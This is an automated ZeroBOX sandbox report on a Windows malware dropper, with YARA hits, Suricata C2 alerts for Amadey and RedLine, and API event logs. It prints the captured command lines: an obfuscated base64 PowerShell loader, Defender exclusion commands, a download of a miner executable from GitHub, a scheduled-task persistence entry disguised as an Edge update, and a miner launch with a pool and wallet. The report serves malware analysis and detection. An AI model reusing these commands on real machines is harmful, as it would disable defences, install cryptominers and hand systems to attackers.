Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 21, 2025, 9:58 a.m.	April 21, 2025, 10:04 a.m.

Size	2.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`7fabf8c4efb42fd2239eadae059e533e`
SHA256	`67b971cc385a4b5241f301f1d9ecef51dd445518bc0cee675d29e67292134379`
CRC32	`F34F4FB7`
ssdeep	`49152:LvIWqgJpdEsqBgveziddkZCasKnS9SuIoHAoY:EobEsqOxkCasKS0uIogo`
PDB Path	wextract.pdb
Yara	PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file IsPE32 - (no description) UPX_Zero - UPX packed file

download.php "C:\Users\test22\AppData\Local\Temp\download.php"
2056
- 1o76j7.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\1o76j7.exe
  2144
  - namez.exe "C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe"
    2276
    - de854920e3.exe "C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe"
      2796
    - LAc2heq.exe "C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe"
      2904
    - Hmcm0Oj.exe "C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe"
      2980
    - 235T1TS.exe "C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe"
      1188
    - xztOH3r.exe "C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe"
      2208
    - 94cd32df1e.exe "C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe"
      2260
    - i5Kz53x.exe "C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe"
      2608
    - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd"
      2844
      - cmd.exe Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
        1228
        
        powershell.exe PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
        2964
    - lBiQciH.exe "C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe"
      2068
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
        1520
        
        powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
        2224
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
        2332
        
        powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
        2012
    - pOqYWAZ.exe "C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe"
      2808
      - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\SystemService\install.bat" "
        2508
        
        net.exe net session
        2044
        
        net1.exe C:\Windows\system32\net1 session
        2468
        
        schtasks.exe schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"
        1600
        
        cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
        1552
        
        powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'"
        1168
        
        crypted.exe C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
        200
    - eZp5zCz.exe "C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe"
      1028
    - hvof1h0.exe "C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe"
      2156
      - hvof1h0.exe "C:\Windows\Temp\{C114507B-F32B-4B28-B4B2-1318F2E1E559}\.cr\hvof1h0.exe" -burn.clean.room="C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe" -burn.filehandle.attached=304 -burn.filehandle.self=312
        1704
    - lBiQciH.exe "C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe"
      2336
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
        1780
        
        powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
        3096
    - 235T1TS.exe "C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe"
      1516
    - i5Kz53x.exe "C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe"
      3192
    - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10074671121\690BRuM.cmd"
      3300
- 2m8357.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2m8357.exe
  2320
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.215.113.41	Active	Moloch
185.215.113.59	Active	Moloch
193.233.237.109	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.59:80 -> 192.168.56.103:49167	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 185.215.113.41:80 -> 192.168.56.103:49172	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 185.215.113.59:80 -> 192.168.56.103:49167	2060969	ET MALWARE Amadey CnC Response	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49174	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49176 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49176	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49172	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49174	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49174	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49168	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49168	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49168	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49183 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49179	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49189	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49183	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49183	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49183	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49195	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 193.233.237.109:1912	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 193.233.237.109:1912	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49208 -> 193.233.237.109:1912	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 193.233.237.109:1912 -> 192.168.56.103:49208	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49208 -> 193.233.237.109:1912	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 193.233.237.109:1912 -> 192.168.56.103:49208	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (18 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 21, 2025, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (42 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:59 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:53 a.m.			0	0
IsDebuggerPresent April 21, 2025, 9:53 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 21, 2025, 10 a.m.	buffer: Processing -WindowStyle 'H' failed: Cannot convert value "H" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 102 events)

Time & API	Arguments	Status	Return
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026e960 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026e2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026e2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026e2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026e2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026e2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026e2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0026eaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003b6740 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd120 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd190 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd190 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd6d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd6d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd6d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd430 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bd5f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bdc80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bdc80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2bdc80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2a6f00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2a6f00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2a6d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2a6d40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2a6f00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2a6f00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2a6f00 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b2eb2b0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 21, 2025, 9:59 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 259 events)

Time & API	Arguments	Status
